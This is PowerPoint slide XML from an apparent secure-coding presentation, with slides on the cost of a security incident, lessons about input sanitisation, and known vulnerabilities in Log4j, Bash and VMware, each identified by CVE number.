            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B4EA9F8-DE83-2C68-7476-187E245159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99892" y="62400"/>
            <a:ext cx="2597175" cy="1074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696412-2EBA-689E-B647-05927CF44F91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501949" y="1287929"/>
            <a:ext cx="7239000" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Many organizations were impacted, and the average cost for incident response was $90,000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE0E24D6-8BA5-D8AD-A556-4911D1198BCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472613" y="2512844"/>
            <a:ext cx="7268336" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Confidentiality, Integrity, and Availability were all compromised</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AD66F93-51EF-D79A-7FCE-DDED71C12713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491663" y="3260706"/>
            <a:ext cx="2069797" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Lessons learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{826BFBC9-726B-D61A-7D0F-1933FCDE49B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3925997"/>
            <a:ext cx="6553200" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Unsafe coding practices, unsafe design, and poor input sanitization can severely impact the CIA of a system, and have a potent financial impact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED63D41E-0C92-FF53-09C3-E2F1A0E4C0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5523" y="2042711"/>
            <a:ext cx="3981544" cy="31746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083622D-EF29-E935-CD24-6AEB84AB5448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5137010"/>
            <a:ext cx="6553200" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>aware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of common vulnerabilities and mistakes can result in more secure software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226230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930A416-0A24-88C0-699D-1D161CE86A0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9FA73706-20BF-1CAF-EBF1-901274A98D44}"/>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442CB376-C272-2977-A98F-A9722D5C7FC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550B10A7-03D7-9067-8798-CCEF8BA56EA7}"/>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9E42E39F-0954-EF0B-6F9E-7D33CA336C43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE98D467-B725-DD18-4B83-0AE2B66D45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Those who cannot learn from history are doomed to repeat it.&quot; - George  Santayana [850×400] : r/QuotesPorn">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29C33283-0B9D-344E-7117-CF38024FB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524000"/>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797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BB1C4E6-71B7-B954-2897-03585F5ECA1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9AAF15A-975C-428C-DB95-7188BDB983F8}"/>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3700F0A2-C3F1-CE89-AA6C-ABE2082C582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69540302-34B1-CF24-75EF-ECB30549AF8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F3CAC263-B26A-70FE-5364-3C514D028DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8581AAA-74F1-25DE-A55F-196B185860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A85C2D5-A78B-A853-A3C0-87060560ECFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="457200"/>
            <a:ext cx="11473013" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Common Vulnerabilities and Exposures (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) are publicly disclosed vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 2" descr="Log4j - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBF20422-829A-EB49-3769-9D9A195168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371600"/>
            <a:ext cx="2597175" cy="107404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821F1BAE-E31F-69B3-A88B-2EE34641D4A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="1908620"/>
            <a:ext cx="1676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3222ED3-67A2-BACB-8B4B-486B58AD9828}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1219200"/>
            <a:ext cx="1524000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability discovered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0B63DA0-D186-C6B7-2CA0-188493F0D75C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6394425" y="1630953"/>
            <a:ext cx="2730235" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CVE-2021-44228</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BAB933E-8749-F7A2-F6C8-36E4617DA585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="5977198"/>
            <a:ext cx="6535764" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://nvd.nist.gov/vuln/detail/cve-2021-44228</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Picture 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3774E5BA-0CEB-F2BD-EA0E-56AE4022B489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379311" y="2505817"/>
            <a:ext cx="6104292" cy="3132983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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73585640-86B2-6060-2577-911F991EA697}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3680460" y="4971495"/>
              <a:ext cx="1015920" cy="582120"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="37" name="Ink 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73585640-86B2-6060-2577-911F991EA697}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3671820" y="4962495"/>
                <a:ext cx="1033560" cy="599760"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1541914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7DAEEB7-7B7C-D89D-6C30-A6D5AE34E2C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6D802F5B-DF83-CCD2-1440-B68DB99C54F8}"/>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CF233C1A-E79F-A1CE-890E-EADD1AA9F891}"/>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71CD8E29-9C59-4B78-B3BE-9335EED84E5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C33AE7D3-F728-6F33-E035-6BF1B45D8D1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82F608FF-0E5F-47E0-86CC-C8625BC3CE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BF6C4B0-5169-1720-C4DD-7F88FCB7A059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="457200"/>
            <a:ext cx="11473013" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Common Vulnerabilities and Exposures (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) are publicly disclosed vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E430A8-8880-2406-88F2-42904A24E962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="1908620"/>
            <a:ext cx="1676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B209A35-3189-0CAF-C78F-1C6D92A716DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1219200"/>
            <a:ext cx="1524000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability discovered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{829D7269-E586-498E-47EB-AA91DB843B8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2514600"/>
            <a:ext cx="7239702" cy="3674697"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2" descr="Bash (Unix shell) - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEF04B74-37DA-6429-7A21-9FE416677F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050369"/>
            <a:ext cx="2823617" cy="1190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1B3A327-698D-0775-E9DE-69B4747B02DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6394425" y="1630953"/>
            <a:ext cx="2541080" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CVE-2014-6271</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2659282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2B6BEE0-FE7D-A664-FE75-43719BCA0964}"/>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6415A80-47E1-7751-30F1-4CBC8FEA7F10}"/>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BA0BCD0E-22C7-B4E8-ECE4-F2F50B1626DA}"/>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F66BD185-AA79-0B77-8CD8-051A9575232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DD9CF8E2-D039-D781-4FE9-40A86F8C1D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EE668FE-8579-A316-3193-330920E307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CDC9E63-2971-AB37-500B-1AF672D26C21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="457200"/>
            <a:ext cx="11473013" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Common Vulnerabilities and Exposures (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) are publicly disclosed vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1018C3-4941-7926-FAC7-D992767E8B15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="1908620"/>
            <a:ext cx="1676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74B43C7-967D-DE7D-0349-7CD9EDAD47F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1219200"/>
            <a:ext cx="1524000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability discovered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AF9D083-B724-6AF7-17DD-A7F4F29F5A72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6394425" y="1630953"/>
            <a:ext cx="2730235" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CVE-202</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-22230</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290" name="Picture 2" descr="VMware">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D159BB2B-307A-8270-27C8-F4E91D4DE1D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6843" b="36842"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1377975" y="1307867"/>
            <a:ext cx="28956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BD3D9EC-B338-F751-1916-59C9B49096E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="2197262"/>
            <a:ext cx="6682497" cy="3644998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
